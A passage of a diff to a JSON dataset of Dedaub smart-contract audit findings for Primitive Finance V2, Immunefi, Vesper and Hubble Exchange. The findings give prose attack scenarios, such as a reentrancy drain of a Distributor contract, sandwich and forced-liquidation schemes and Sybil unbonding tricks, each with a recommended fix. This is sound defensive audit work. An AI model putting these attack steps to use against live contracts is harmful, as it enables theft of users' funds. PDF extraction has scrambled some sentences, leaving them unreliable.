snippet addresses both this issue and issue H1: if (params.toMargin) { margins[params.engine][msg.sender].deposit( params.riskyForStable ? params.deltaOut : 0, params.riskyForStable ? 0 : params.deltaOut ); } 0 [After our report, the Primitive Finance team identied that the deltaOut amount was deposited in the wrong margin, i.e., deltaOut risky in stable margin and the other way around. Consequently, the above example has the ternary operator result expressions inverted in its nal form.] MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ", + "labels": [ + "Dedaub", + "Primitive Finance V2", + "Severity: High" + ] + }, + { + "title": "Flash-Loan Functionality ", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": " DISMISSED PrimitiveEngine::swap can be actually used to get flash loans from the Primitive reserves. However, this functionality is not documented and may have been implemented by mistake. One can get flash loans by implementing a contract with the swapCallback function. When this gets called by the engine, the output ER", + "labels": [ + "Dedaub", + "Primitive Finance V2", "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "storage eld Resolved In CompoundLeverageStrategy, eld borrowToken is unused. A comment mentions it but does not match the code. L3 Two swaps could be made one, for fee savings Dismissed, detailed consideration In CompoundXYStrategy::_repay, COMP is rst swapped into collateral, and then collateral (which should be primarily, if not exclusively, the swapped COMP) is swapped to the borrow token. This incurs double swap fees. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing. Nr. Description", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": "have already been transferred to the engine contract, and all that is required for the rest of the transaction to succeed is to transfer the input tokens back.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Primitive Finance V2", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": "Multicall Error Handling OPEN The Multicall error handling mechanism assumes a xed ABI for error messages. This would have worked in Solidity 0.7.x for the default Error(string) ABI. However, Solidity has custom ABIs for 0.8.x that can encode valid errors with a shorter returndata. The correct way to propagate errors is to re-raise them (e.g., by copying the returndata to the revert input data). 0", + "labels": [ + "Dedaub", + "Primitive Finance V2", "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "contract seems to serve no purpose Status Open This contract currently does nearly nothing. It is neither inherited nor exports functionality that makes it usable as part of a VFR strategy. 9", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": "Reserve Balance Mechanisms DISMISSED The balances of the two reserve tokens in the engine are sometimes tracked by incrementing/decrementing internal counters and sometimes by checking balanceOf(). This not only causes the system to read more storage locations, and thus consume more gas, but it also automatically disqualies tokens that have dynamic balances such as aTokens. Fixed Swap Fee Might Not Compensate Theta Decay For All L4 Asset Pairs SPEC CHANGED Options, manifesting themselves as asset pairs of dierent types will encode dierent proportions of intrinsic and extrinsic value. Although the swap fee is meant to compensate for theta decay, it seems strange that this cannot be set per curve or per token pair. We note however that other important parameters such as sigma are customizable. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Primitive Finance V2", + "Severity: Low" + ] + }, + { + "title": "always returns true ", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": " RESOLVED Transfers::safeTransfer return value is always true (as noted in a comment), thus can be removed as an optimization.", + "labels": [ + "Dedaub", + "Primitive Finance V2", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "contract is there only for code reuse Open The VFR contract currently has the form: abstract contract VFR { function _transferProfit(...) internal virtual returns (uint256) {...} function _handleStableProfit(...) internal returns (uint256 _profit) {...} function _handleCoverageProfit(...) internal returns (uint256 _profit) {...} } It is, thus, a contract that merely denes internal functions, used via inheritance, for code reuse purposes. Inheritance for code reuse is often considered a bad, low-level coding practice. A similar effect may be more cleanly achieved via use of a library.", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": "zero liquidity check in PrimitiveEngine::remove RESOLVED PrimitiveEngine::remove does not revert in case of 0 provided liquidity, which leads to unnecessary computation and gas fee for the user. PrimitiveHouse::remove implements an early check for such a scenario.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Primitive Finance V2", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "reserved tokens Open In most strategies the collateral token is part of those in isReservedToken. Not in AlphaLendStrategy.", + "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", + "body": "Bookkeeping and Transfers DISMISSED The architecture as it currently stands, and the relationship between PrimitiveHouse and PrimitiveEngine causes multiple token transfers to intermediate contracts, and multiple layers of bookkeeping, with some redundancy. This causes the application to consume more gas. DISMISSED: The specic architecture is highly desired by the protocol developers. Nevertheless, a few transfer operations have been optimized. A4 No engine-risky-stable sanity check in PrimitiveHouse RESOLVED create and allocate methods In PrimitiveHouse::create and PrimitiveHouse::allocate the user has to provide the PrimitiveEngine address and the addresses of the risky and stable tokens, while there is no early check that ensures the pair of risky and stable tokens provided corresponds to the engine address. This check is implemented in the respective callback functions, maintaining the security of the protocol. However, the 0 execution of the contract will only revert at such a late point (i.e., in the callback) even if a user provides a wrong engine, risky and stable tokens triplet by mistake, leading to unnecessary gas consumption, which could have been avoided with an early check. 0", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Primitive Finance V2", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "COMP rewards can be triggered by anyone Dismissed, after review COMP Although we cannot see an issue with it, multiple public functions allow anyone to trigger a claim methods of totalValueCurrent/isLossMaking, and similarly in CompoundXYStrategy. It is worth revisiting whether the timing of rewards can confer a benet to a user. CompoundLeverageStrategy rewards, e.g., in", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "adversary can alter the amount in Distributor.deposit Resolved (but since entire VestingNFTReceiver is removed, similar threats need to be considered in the context of the new architecture upon future audits) Distributor::deposit computes the withdrawAmount by comparing the balance before and after the transfer: uint256 initialBalance = _thisBalance(token); if (token == NATIVE_ASSET) { payable(receiver).sendValue(amount); } else { token.safeTransfer(receiver, amount); } uint256 finalBalance = _thisBalance(token); require(initialBalance > finalBalance, \"Distributor: did not withdraw\"); uint256 withdrawAmount = initialBalance - finalBalance; An adversary who controls the deposit of funds to the distributor can start withdrawing, and deposit funds back to the distributor from within his receive hook. This will cause the distributor to register a possibly much smaller withdrawAmount than the amount actually withdrawn. When used in combination with vestingNFTReceiver, an attack can be executed as follows: First, the adversary withdraws an amount from vesting into the distributor, by calling VestingNFTReceiver::withdraw via Distributor::call Then the adversary starts withdrawing the same amount from the distributor (even if the amount is larger than his own share) From within his receive hook, the adversary releases an equal amount (minus 1 wei) from vesting to the distributor (again by calling VestingNFTReceiver::withdraw via Distributor::call) As a result, the distributor registered a withdrawal of just 1 wei, and the adversary can withdraw again. Using the above procedure, an adversary with only 1% share can withdraw all funds from the distributor in a single transaction. An exploit of this vulnerability has been implemented and will be provided together with this report. 5 This vulnerability can be prevented by a cross-contract lock that prevents entering VestingNFTReceiver::withdraw while Distributor::withdraw is active. A lighter (but less robust) solution is to add the following check: require(withdrawAmount >= amount) One should also keep in mind a symmetric but harder to exploit vulnerability: if the victim calls Distributor::withdraw, and in his receive hook triggers some untrusted code (e.g., transfers the received funds), the adversary can do a nested Distributor::withdraw, causing the distributor to register a larger withdrawn amount for the victim that the real one (hence increasing the adversary's share). A nonReentrant guard in Distributor::withdraw prevents this. The general recommendation at the end of C2 also applies here. C2 The adversary can transferOwnership on Resolved vestingNFTReceiver change Via Distributor::call, an adversary can call VestingNFTReceiver::transferOwnership and call VestingNFTReceiver::withdraw directly (not via the distributor) and receive all vesting funds. himself, which ownership him to allows then the to This can be solved by removing the transferOwnership method and baking the owner into the VestingNFTReceiver during initialization. As a general recommendation, having a general-purpose Distributor contract which allows arbitrary interactions with VestingNFTReceiver via Distributor::call, makes it much harder to design a safe interface. We recommend using a distributor contract with exactly the needed functionality, possibly even merged with VestingNFTReceiver. This would easily solve C2, and would also make it easy to add a lock that solves C1. High Severity ", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Immunefi", + "Severity: Critical" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "logic error in SumVesting combinator schedule Status Dismissed (intended behavior, assumptions on vesting schedules will be clearly stated) In combinator schedule SumVesting.sol it is implicitly assumed that the result of the sub-controllers for both getVested() and getWeight() is linearly dependant on the input amount function getVested(CommonParameters calldata input) external pure override returns (uint256 result) { [...] for (uint256 i; i < subControllers.length; i++) { IVestingController subController = subControllers[i]; uint256 share = subShares[i]; // Dedaub: should be input.amount * share/totalShares // Dedaub: but the division happens in the end nextInput.amount = share * input.amount; totalShares += share; [...] result += subController.getVested(nextInput); } result /= totalShares; } Thus the whole input amount is passed to all sub-controllers only to divide the accumulated result amount to the totalShares at the very end. While this assumption holds in the case of simple schedules, such as CliffVesting and LinearVesting, it may not hold for more complex ones that may be added in the future. 9 Similarly, an inaccurate input amount getContext(), createInitialState() and triggerEvent(). is passed to the sub-controllers in functions", + "labels": [ + "Dedaub", + "Immunefi", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "conventions Resolved often functionality Similar instance, between different CompoundXYStrategyETH and CompoundLeverageStrategyETH, we notice a difference in the _mint function (in one case it returns a value in the other not), and the presence of an _afterRedeem vs. full overriding of _redeemUnderlying. conventions. For follows", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "testing that a transaction succeeded Resolved The following test is taken from test/commentary_tests.js : await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)); await expect(Notary.connect(Operator).submitCommentary(BYTES32_ZERO)).to.be.reverted; It seems that the intention of the rst line is to test that submitCommentary succeeded without reverting. However this line does not really check anything, the test will pass even if submitCommentary reverts. The correct test would be: await expect(Notary.connect(Operator).submitCommentary(BYTES32_STRING)).not.to.be.rever ted; similar Many exist test/distributor_tests.js (and possibly elsewhere). commentary_tests.js, cases in contract_tests.js and In the following case, adding the .not.to.be.reverted revealed logic errors in the test: it(\"Validating the attestation on disclosed report `AFTER` ATTESTATION_DELAY\", async function () { await Notary.connect(Triager).attest(reportRoot, kk, commit) await expect(Notary.connect(Triager).disclose(reportRoot, key, salt, value, merkleProofval)) const increaseTime = ATTESTATION_DELAY * 60 * 60 // ATTESTION in `hour` format x 60 min x 60 sec await ethers.provider.send(\"evm_increaseTime\", [increaseTime]) // 1. increase block time await ethers.provider.send(\"evm_mine\") // 2. then mine the block ... Here, disclose is executed before the ATTESTATION_DELAY so it should fail, although the test makes it look like it should succeed. The reason why the test passes is that: 1. The await expect(...) line performs no checks 10 2. Moreover this line does not wait for the transaction to nish, so although disclose is launched before moving time forward, it is executed in the future block, after the time delay, and as a consequence it succeeds. So, if .not.to.be.reverted is added to the await expect(...) line, the test will fail, unless the line is moved after the time increase.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Immunefi", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "looser checks are performed on construction than on Resolved migrateFusePool() When the RariFuseStrategy is constructed, a CToken (assumed to belong to an instantiation of a Rari Fuse pool) is passed as an argument. However, when the strategy migrates to another Fuse pool, Fuses API is used to ensure the new CToken will be part of a Rari Fuse pool. The same checks should also take place during the contracts construction. 10 A7 Compiler bugs Info The contracts were compiled with the Solidity compiler v0.8.3 which, at the time of writing, has a known minor issue. We have reviewed the issue and do not believe it to affect the contracts. More specically the known compiler bug associated with Solidity compiler v0.8.3: Memory layout corruption can happen when using abi.decode for the deserialization of two-dimensional arrays. 11", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "variables Resolved There are some variables in contracts Distributor.sol and TokenMinter.sol that are assigned during contract construction and could never change thereafter. In Distributor.sol: /// Only settable by the initializer. bool public override callEnabled; address public override nftHolder; uint256 public override maxBeneficiaries In TokenMinter.sol: /// This initialized by the deployer. The token is completely trusted. IImmunefiToken public override token; We suggest these variables be declared immutable for clarity and gas efciency.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", + "Immunefi", "Severity: Informational" ] }, { - "title": "Liquidations of Maker ", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": " DISMISSED The crypto-economic design of this protocol can lead to force-liquidation of Makers through very small price movements. The following design elements make it easy to force liquidate makers: - Curve-Crypto AMM can yield the same price with dierent pool compositions - Spread limit is hard to trigger with single transactions Scenario: Bob wants to force liquidate Alices maker position to perform a liquidation slippage sandwich. [Note: the following gures are approximate] 1. With a small amount of margin, Alice opens a maker position: $3000 + 0.5ETH, when ETH is at $2000. Note that the pool is not perfectly balanced. 2. Bob opens a large short position, say 10ETH, moving ETH price to $1900. 3. The pools composition changed signicantly with one swap, but not the price. 4. Alices position is now around $1100 + 1.5ETH, so openNotional = 1900 and position = 1 5. Alices maker debt is $6000 6. Alices notionalPosition is $7900 0 The result is that with < 5% price change, Alices margin fraction has decreased by 25%", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "receive hook Dismissed (hook needed by IVestingNFTFunder.vestingN FTCallback) The receive() hook in VestingNFT is not to be used intentionally, since ETH is received via mint(). It would be better to revert to avoid accidentally receiving ETH.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "process is easily circumvented DISMISSED The unbonding process can be easily circumvented through a variation on the Sybil aack. Unbonding liquidity at will enables other aacks such as liquidity frontrunning. Scenario: Alice wants to add amount of liquidity, and be able to withdraw /3 of her liquidity on any one day. We assume that the withdrawal period is N days and the unbonding period is M days. This means that using the following strategy, alice can always remove / liquidity, like so: 1. Alice deposits / each day for M days on M dierent addresses 2. After M days, Alice goes through each address where the withdrawal expired and requests unbonding again. 3. At any day, after the rst M days, alice can withdraw up to / of her liquidity.", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "need to construct a Merkle Tree can be easily avoided Open A large amount of code (MerkleTree.sol / QuickSort.sol) is aimed at constructing (rather than verifying) a MT. However, this is only used by BugReportNotary.assignNullCommentary to construct a tree for a trivial empty commentary. This can be easily avoided by having a hard-coded constant value NULL_COMMENTARY that denotes an empty commentary. The call to discloseCommentary can be omitted in this case 11 (or discloseCommentary can simply check that the value is empty) and NULL_COMMENTARY can be immediately set as canonical.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "amount is not reset on liquidation RESOLVED A makers liquidation calls method AMM::forceRemoveLiquidity, which in turn calls AMM::_removeLiquidity and operates in the same manner as the regular removeLiquidity thereafter, but does not reset a pending unbonding amount that the maker might have. The function AMM::removeLiquidity on the other hand, deducts the unbonding amount accordingly: Maker storage _maker = _makers[maker]; _maker.unbondAmount -= amount;", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "code Partially resolved (dead code still present in LinearVesting.sol) In vesting schedule CliffVesting.sol function _decodeParams() is supposed to return a uint256 value function _decodeParams(bytes calldata params) internal pure returns (uint256 cliffTime) { cliffTime = abi.decode(params, (uint256)); } However, this schedule requires an empty parameter list function checkParams(CommonParameters calldata input) external pure override { require(input.params.length == 0); } All three internal functions _decodeParams(), _decodeState() and decodeContext() are never called for CliffVesting, while the later two are also never called for LinearVesting schedules. We suggest that all unused functions be removed for clarity and gas savings. Alternatively, the current body of CliffVesting::_decodeParams should be removed.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "function argument Resolved (argument is not redundant for code extensibility reasons) In KeeperRewards::keeperRewards the rst argument is redundant function keeperRewards(address, uint256 value) external pure override returns (uint256) { return value / 1000; } We suggest it be removed for clarity. Also, the constant 1000 in the same code is an arbitrary magic constant, best given a name to document intent.", + "labels": [ + "Dedaub", + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "Liquidations ACKNOWLEDGED 0 The risk of cascading liquidations in Hubble are relatively high, especially where maker liquidations are concerned. Takers are relatively protected from triggering liquidations of other takers due to the dual mode margin fraction mechanism (which uses oracle prices in cases of large divergences between mark and index prices). However, a taker liquidation can trigger a maker liquidation (see M1). In turn the removal of maker liquidity makes the price derived via Swap::get_dy and Swap::get_dx lower. The following are our inferred cascading liquidation risks: - Taker liquidation triggering a taker liquidation (low) - Maker liquidation triggering a taker liquidation (medium, eect of swap price movement in addition to the eect of removal of liquidity) - Maker liquidation triggering a maker liquidation (high, see M1) - Taker liquidation triggering a maker liquidation (high, see M1)", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "calling pattern Resolved 12 In BugReportNotary the MerkleProof::verify function is called with different syntax. Once as: merkleProof.verify(reportRoot, leafHash) and once as: MerkleProof.verify(merkleProof, commentaryRoot, leafHash) We recommend making uniform for consistency.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "stakers who double as liquidators can increase their share of the pool RESOLVED [This issue was partially known to the developers] If an insurance staker also doubles as a liquidator, then they can: 1. Withdraw their insurance contribution 2. Liquidate bad debt 3. Sele bad debt using other users insurance stake 4. Re-deposit their stake again The liquidator/staker now owns a larger portion of the pool. This eect can be compounded. Opening multiple tiny positions to make liquidations", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "in vestingNFT Info The README asks for possible ways to remove ReentrancyGuard from vestingNFT. We believe that these guards are critical and advise against trying to remove them (we see no safe way to do so, while keeping the dynamic way of computing the amount of transferred tokens). In particular, a reentrancy to mint from withdraw will directly lead to a severe loss of funds. Currently this is indirectly protected by the nonReentrant ag in _deposit and _beforeTokenTransferInner (we recommend clearly documenting the importance of these ags, to prevent them from getting accidentally removed).", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "unprotable 0 There are no restrictions on the minimum size of the position a user can open and on the minimum amount of collateral he should deposit when an account is opened. A really small position will be unprotable for an arbitrageur to liquidate. An adversary could take advantage of this fact and open a huge number of tiny positions, using dierent accounts. The adversary might not be able to get a direct prot from such an approach, but since these positions are going to stay open for a long time, as no one will have a prot by liquidating them, they can signicantly shift the price of the vAMM with small risk. To safeguard against such aacks we suggest that a lower bound on the position size and collateral should be used. Liquidating own tiny maker position to prot from the xed", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "funds in a single contract (VestingNFT) Info The architecture stores all ERC-20 tokens (assets) in a single contract (VestingNFT), and accounting for how they are shared among many different NFTs/bounties. This is a decision that puts a signicant burden on asset accounting. It should be simpler/safer to have a treasury contract that indexes assets by NFT and keeps assets entirely separate. However, the current design seems to exist in order to support ERC-20 tokens that change in number, with time. This certainly necessitates a shares model instead of a separate accounts model. It may be good to document exactly the behavior of tokens that the designer of the contract expects, with specic token examples. There are certainly token models that will not be supported by the current design, and others that are. A more radical approach could also be to use a clone of VestingNFT for each bounty (similarly to how clones of vestingNTFReceiver are used), so that funds for each bounty are kept in a separate contract. Apart from facilitating the accounting (no need for a \"shares\" model), this design would likely mitigate the losses from a critical bug (the adversary could drain a single bounty but not all of them).", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "fee As discussed in issue M6, one can open a however small position they want. The same is true when providing liquidity. On the other hand the incentive fee for liquidating a maker, i.e., someone that provides liquidity, is xed and its 20 dollars as dened in ClearingHouse::fixedMakerLiquidationFee. Thus, one could provide really tiny amounts of liquidity (with tiny amounts of collateral backing it) and liquidate themselves with another account to make a prot from the liquidation fee. Networks with small transaction fees (e.g., Avalanche) or", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "code Resolved 13 The function QuickSort::sort admits some simplications/dead-code elimination. Some of these are only possible under the invariant left < right (which is true in the current uses of the function), others regardless. We highlight them in the four code comments below. function sort( bytes32[] memory arr, uint256 left, uint256 right // Dedaub: invariant: left < right ) internal pure { uint256 i = left; uint256 j = right; if (i == j) return; // Dedaub: dead code, under invariant bytes32 pivot = arr[left + (right - left) / 2]; while (i <= j) { // Dedaub: definitely true the first time, under invariant, // loop could be a do..while while (arr[i] < pivot) i++; while (pivot < arr[j]) j--; if (i <= j) { // Dedaub: always the case, no need to check (arr[i], arr[j]) = (arr[j], arr[i]); i++; j--; } } if (left < j) sort(arr, left, j); if (i < right) sort(arr, i, right); }", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "could make such an aack really protable, especially if executed on a large scale. ClearingHouse::isMaker does not take into account makers", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "cannot recover from renouncing Dismissed (intended behavior) In the ImplOwnable contract (currently unused) if the owner calls renounceOwnership, no new owner can be installed. It is unclear whether this is intentional and whether the contract will be used in the future.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "ignition share Method ClearingHouse::isMaker checks if a user is a maker by implementing the following check: function isMaker(address trader) override public view returns(bool) { uint numAmms = amms.length; for (uint i; i < numAmms; ++i) { IAMM.Maker memory maker = amms[i].makers(trader); if (maker.dToken > 0) { 0 return true; } } return false; } However, the AMM could still be in the ignition phase, meaning that the maker could have provided liquidity that in maker.ignition. This omission could allow liquidation of a users taker positions before its maker positions, which is something undesirable, as dened by the liquidate and liquidateTaker methods of ClearingHouse. reflected in maker.dToken but is not yet", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "for contract size Info 14 For the bytecode size issues of VestingNFT, our suggestion would be to create a VestingNFT library contract (containing all functions that do not heavily involve storage slots, such as pure functions, some views that only affect 1-2 storage slots) and have calls in VestingNFT delegate to the library versions. Shorter-term solutions might exist (e.g., removing one of the super-contracts, such as DelegateGuard, in some way) but they will not save a large contract from bumping against size limits for long.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "Slippage Sandwich Attack ACKNOWLEDGED [The aack is related to already known issues, but is documented in more detail here] 1. Alice has a long position that is underwater 2. Bob opens a large short position 3. Bob liquidates Alice. This triggers a swap in the same direction as Bobs position and causes slippage. 4. Bob closes his position, and prots on the slippage at the expense of Alice. M10 Self close bad debt attack DISMISSED This is a non-specic aack on the economics of the protocol. 1. Alice opens a short position using account A 2. Alice opens a large long position using account B 3. In the meantime, the market moves up. 4. Alice closes her under-collateralized position A. Bad debt occurs. 5. Alice can now close position B and realize her prot 09 LOW SEVERITY: ", + "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", + "body": "pragma Open Use of a oating pragma: The oating pragma pragma solidity ^0.8.6; is used, allowing contracts to be compiled with any version of the Solidity compiler that is greater or equal to v0.8.6 and lower than v.0.9.0. Although the differences between these versions should be small, for deployment, oating pragmas should ideally be avoided and the pragma be xed. A15 Compiler known issues Info Solidity compiler v0.8.6, at the time of writing, has no known bugs. 15", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Medium" + "Immunefi", + "Severity: Informational" ] }, { - "title": "neutra ", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": " ACKNOWLEDGED Maker debt, calculated as the vUSD amount * 2 when the liquidity was added never changes. If the maker has gained out of her impermanent position, e.g., through fees, this is not accounted for, in certain kinds of liquidations (via oracle). However, if the maker now removes their liquidity, closes their impermanent position and adds the same amount of liquidity, the debt is reset to a dierent amount.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "(or consulting an oracle for pricing) can be front-run Status Open 4 There are many instances of Uniswap/Sushiswap swaps and oracle queries (mainly wrapped in calls to to the internal swapManager.safeGetAmountsOut, swapTokensForExactTokens, bestOutputFixedInput) that can be front-run or return biased results through tilted exchange pools. Fixing this requires careful thought, but the codebase has already started integrating a simple time-weighted average price oracle. function Strategy::_safeSwap, but also as direct calls calls and to We have warned about such swaps in past audits and the saving grace has been that the swapped amounts are small: typically interest/reward payments only. Thus, tilting the exchange pool is not protable for an attacker. In CompoundXYStrategy (which contains many of these calls), swaps are performed not just from the COMP rewards token but also from the collateral token. Similarly, in the Earn strategies, the _convertCollateralToDrip does an unrestricted collateral swap, on the default path (no swapSlippage dened). Swapping collateral (up to all available) should be ne if the only collateral token amounts held in the strategy at the time of the swap are from exchanging COMP or other rewards. Still, this seems like a dangerous practice. Standard background: The problem is that the swap can be sandwiched by an attacker collaborating with a miner. This is a very common pattern in recent months, with MEV (Maximum Extractable Value) attacks for total sums in the hundreds of millions. The current code complexity offers some small protection: typically attackers colluding with miners currently only attack the simplest, lowest-risk (to them) transactions. However, with small code analysis of the Vesper code, an attacker can recognize quickly the potential for sandwiching and issue an attack, rst tilting the swap pool and then restoring it, to retrieve most of the funds swapped by the Vesper code. In the current state of the code, the attacker will likely need to tilt two pools: both Uniswap and Sushiswap. However, this also offers little protection, since they both use similar on-chain price computations and near-identical APIs. In the short-term, deployed code should be closely monitored to ensure the swapped amounts are very small (under 0.3%) relative to the size of the pools involved. Also, if an attack is detected, the contract should be paused to avoid repeat attacks. However, the code should evolve to have an estimate of asset pricing at the earliest possible time! This can be achieved by using the TWAP functionality that is already being added, with some tolerance based on this expected price.", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Vesper Pools+Strategies September", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "blacklisting checks are incomplete RESOLVED The ClearingHouse contract can set and use a Blacklist contract to ban certain users from opening new positions. However, these same users are not blacklisted from providing liquidity to the protocol, i.e., having impermanent positions, which can be turned into permanent ones when the liquidity is removed. Although this form of opening positions is not controllable, it would be beer if blacklisted users were also banned from providing liquidity.", + "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", + "body": "non-standard ERC20 Tokens can be stuck inside the Resolved VFRBuffer 5 The VFRBuffer does not use the safeERC20 library for the transfer of ERC20 tokens. This can cause non-standard tokens (for example USDT) to be unable to be transferred inside the Buffer and get stuck there. This issue would normally be ranked lower, but since USDT is actively used in past strategies, it seems likely to arise with upcoming instantiations of the VFR pool. Medium Severity Nr. Description", "labels": [ "Dedaub", - "Hubble Exchange", - "Severity: Low" + "Vesper Pools+Strategies September", + "Severity: High" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", - "body": "could potentially be reentered RESOLVED VUSD::processWithdrawals of the VUSD contract calls method safeTransfer on the reserveToken dened in VUSD. 01 function processWithdrawals() external whenNotPaused { uint reserve = reserveToken.balanceOf(address(this)); require(reserve >= withdrawals[start].amount, 'Cannot process withdrawals at this time: Not enough balance'); uint i = start; while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) { Withdrawal memory withdrawal = withdrawals[i]; if (reserve < withdrawal.amount) { break; } reserve -= withdrawal.amount; reserveToken.safeTransfer(withdrawal.usr, withdrawal.amount); i += 1; } start = i; } In the unlikely scenario that the safeTransfer method (or a method safeTransfer calls internally) of reserveToken allows calling an arbitrary contract, then that contract can reenter the processWithdrawals method. As the start storage variable will not have been updated (it is updated at the very end of the method), the same withdrawal will be executed twice if the contracts reserveToken balance is suicient. Actually, if reentrancy is 